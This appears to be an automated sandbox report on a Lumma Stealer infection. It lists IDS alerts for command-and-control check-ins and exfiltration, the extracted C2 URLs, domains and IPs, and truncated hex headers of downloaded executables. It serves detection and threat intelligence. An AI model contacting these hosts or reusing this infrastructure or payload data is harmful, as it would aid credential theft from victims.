Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50234 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50238 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50234 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50243 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50243 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50245 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50244 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50244 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50264 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50271 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50262 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50262 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50242 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50259 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50232 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50259 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50232 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50302 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50296 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50296 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown Network traffic detected: DNS query count 33
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:55:20 GMTContent-Type: application/octet-streamContent-Length: 2837504Last-Modified: Wed, 30 Oct 2024 20:43:26 GMTConnection: keep-aliveETag: "67229a6e-2b4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 9c 83 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 6b 65 6f 76 6a 6b 63 00 00 2b 00 00 a0 00 00 00 ec 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 78 61 64 6b 70 71 61 00 20 00 00 00 a0 2b 00 00 04 00 00 00 26 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 2a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:55:26 GMTContent-Type: application/octet-streamContent-Length: 1911296Last-Modified: Wed, 30 Oct 2024 20:53:56 GMTConnection: keep-aliveETag: "67229ce4-1d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 6a e4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b6 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 b6 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 62 67 68 74 69 71 78 00 10 1a 00 00 b0 31 00 00 0c 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 65 6c 74 63 6a 6c 78 00 10 00 00 00 c0 4b 00 00 06 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:08 GMTContent-Type: application/octet-streamContent-Length: 2985984Last-Modified: Wed, 30 Oct 2024 20:53:36 GMTConnection: keep-aliveETag: "67229cd0-2d9000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 30 00 00 04 00 00 db 73 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 77 61 61 73 62 76 62 6e 00 e0 2a 00 00 b0 05 00 00 d6 2a 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6b 72 70 62 71 70 65 00 10 00 00 00 90 30 00 00 04 00 00 00 6a 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 30 00 00 22 00 00 00 6e 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:18 GMTContent-Type: application/octet-streamContent-Length: 2146304Last-Modified: Wed, 30 Oct 2024 20:53:49 GMTConnection: keep-aliveETag: "67229cdd-20c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 73 00 00 04 00 00 57 09 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6e 6c 65 71 64 6c 6a 00 10 1a 00 00 00 59 00 00 0e 1a 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 66 63 64 6b 6f 68 66 00 10 00 00 00 10 73 00 00 06 00 00 00 98 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 73 00 00 22 00 00 00 9e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:28 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 30 Oct 2024 20:42:59 GMTConnection: keep-aliveETag: "67229a53-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4b 9a 22 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 eb d9 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 20:56:35 GMTContent-Type: application/octet-streamContent-Length: 2837504Last-Modified: Wed, 30 Oct 2024 20:43:26 GMTConnection: keep-aliveETag: "67229a6e-2b4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 9c 83 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 6b 65 6f 76 6a 6b 63 00 00 2b 00 00 a0 00 00 00 ec 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 78 61 64 6b 70 71 61 00 20 00 00 00 a0 2b 00 00 04 00 00 00 26 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 2a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
